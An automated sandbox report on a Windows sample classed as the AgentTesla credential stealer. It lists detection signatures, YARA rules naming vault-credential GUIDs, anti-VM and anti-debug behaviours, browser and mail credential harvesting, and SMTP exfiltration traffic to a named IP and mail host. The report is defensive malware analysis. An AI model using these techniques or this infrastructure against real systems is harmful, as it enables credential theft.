Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
Analysis ID:1427766
MD5:149275db93dd2dab22f5dc0356a774fc
SHA1:fd87ea7b7dc122528ca9efa769f4b404c49b0beb
SHA256:dc275961e09616fcda47d2acee085f1742c22e9066465eda4a06672d2efffc8c
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe (PID: 5448 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe" MD5: 149275DB93DD2DAB22F5DC0356A774FC)
    • RegSvcs.exe (PID: 4868 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.4630422433.00000000031FD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.4630422433.0000000003205000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000004.00000002.4630422433.00000000031D5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 8 entries
              SourceRuleDescriptionAuthorStrings
              4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    4.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x341d1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x34243:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x342cd:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x3435f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x343c9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x3443b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x344d1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x34561:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 14 entries

                      System Summary

                      barindex
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.185.35.67, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 4868, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49725
                      Timestamp:04/18/24-06:25:21.205154
                      SID:2030171
                      Source Port:49725
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeAvira: detected
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeReversingLabs: Detection: 34%
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeVirustotal: Detection: 34%Perma Link
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeJoe Sandbox ML: detected
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49722 version: TLS 1.2
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49725 -> 192.185.35.67:587
                      Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: ip-api.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.ipify.org
                      Source: RegSvcs.exe, 00000004.00000002.4630422433.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4630422433.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: RegSvcs.exe, 00000004.00000002.4630422433.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.nationalkham.com
                      Source: RegSvcs.exe, 00000004.00000002.4630422433.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeString found in binary or memory: http://weather.yahooapis.com/forecastrss?w=4118
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeString found in binary or memory: http://www.ctvnews.ca/rss/business/ctv-news-business-headlines-1.867648
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeString found in binary or memory: http://www.ctvnews.ca/rss/ctvnews-ca-top-stories-public-rss-1.822009
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeString found in binary or memory: http://xml.weather.yahoo.com/ns/rss/1.0
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4630422433.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: RegSvcs.exe, 00000004.00000002.4630422433.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: RegSvcs.exe, 00000004.00000002.4630422433.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49722 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, cPKWk.cs.Net Code: NikjhBPi

                      System Summary

                      barindex
                      Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.7100000.4.raw.unpack, LoginForm.csLarge array initialization: : array initializer size 33603
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.2c33f50.0.raw.unpack, LoginForm.csLarge array initialization: : array initializer size 33603
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_071411900_2_07141190
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_071402E00_2_071402E0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_071420300_2_07142030
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_071432580_2_07143258
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_071434A00_2_071434A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_07142EE80_2_07142EE8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_00FFDDCC0_2_00FFDDCC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_051F00060_2_051F0006
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_051F00400_2_051F0040
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_051FFC180_2_051FFC18
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_051FFC400_2_051FFC40
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_0524D9C80_2_0524D9C8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_0524FBD80_2_0524FBD8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_0524D9A00_2_0524D9A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_0524FBC80_2_0524FBC8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_073B0F180_2_073B0F18
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_073B4FB80_2_073B4FB8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_073B62B80_2_073B62B8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_073B0AE00_2_073B0AE0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_073B0AD00_2_073B0AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02F9E7684_2_02F9E768
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02F94AC84_2_02F94AC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02F93EB04_2_02F93EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02F941F84_2_02F941F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EA66D84_2_06EA66D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EA0A164_2_06EA0A16
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EAB3C04_2_06EAB3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EA33084_2_06EA3308
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EAE8684_2_06EAE868
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EA88104_2_06EA8810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EA8F134_2_06EA8F13
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EAACE04_2_06EAACE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EA59E04_2_06EA59E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_06EA36CC4_2_06EA36CC
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2190872657.000000000A320000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2182749380.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2189260177.0000000007100000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2181221284.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000000.2170168370.00000000008EA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekrZD.exe8 vs SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2182749380.0000000002E46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename04270d52-09be-426d-981e-ac7270cab5c5.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename04270d52-09be-426d-981e-ac7270cab5c5.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeBinary or memory string: OriginalFilenamekrZD.exe8 vs SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, yO87opgGJjyrnBtI4D.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, yO87opgGJjyrnBtI4D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, yO87opgGJjyrnBtI4D.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, yO87opgGJjyrnBtI4D.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, yO87opgGJjyrnBtI4D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, yO87opgGJjyrnBtI4D.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, yO87opgGJjyrnBtI4D.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, yO87opgGJjyrnBtI4D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, yO87opgGJjyrnBtI4D.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, MgZETsGPO4Ak6hkigF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, MgZETsGPO4Ak6hkigF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, MgZETsGPO4Ak6hkigF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeReversingLabs: Detection: 34%
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeVirustotal: Detection: 34%
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: uxtheme.dllJump to behavior
